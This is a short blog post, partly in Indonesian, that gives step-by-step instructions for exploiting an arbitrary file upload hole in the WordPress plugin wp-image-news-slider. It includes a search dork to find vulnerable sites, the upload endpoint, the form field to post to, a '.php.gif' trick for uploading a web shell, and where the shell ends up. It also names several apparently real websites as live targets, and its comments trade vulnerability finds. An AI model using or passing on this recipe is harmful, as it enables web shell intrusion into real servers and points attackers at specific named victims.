Tuesday 27 February 2018

Arbitrary File Upload wp-image-news-slider Vulnerability

Dork: inurl:wp-content/plugins/wp-image-news-slider
Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
Dorking dulu pake dork diatas pilih target, buka upload.php
Vuln: "No upload found in $_FILES for Filedata"
CSRF Online: Click Here
URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
POST File: Filedata
Upload shell ext: .php.gif
shell location: /wp-content/uploads/random_name.php.gif
Live Target/Demo:
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
Previous Post
Next Post

7 comments:

  1. Web nya di kembangin lagi ea
    idiot-blackhat.cf
    Gw nemu celah

    ReplyDelete
  2. Gw minta script web nya donk yang dulu
    Entar gw kasih tahu vuln apa

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete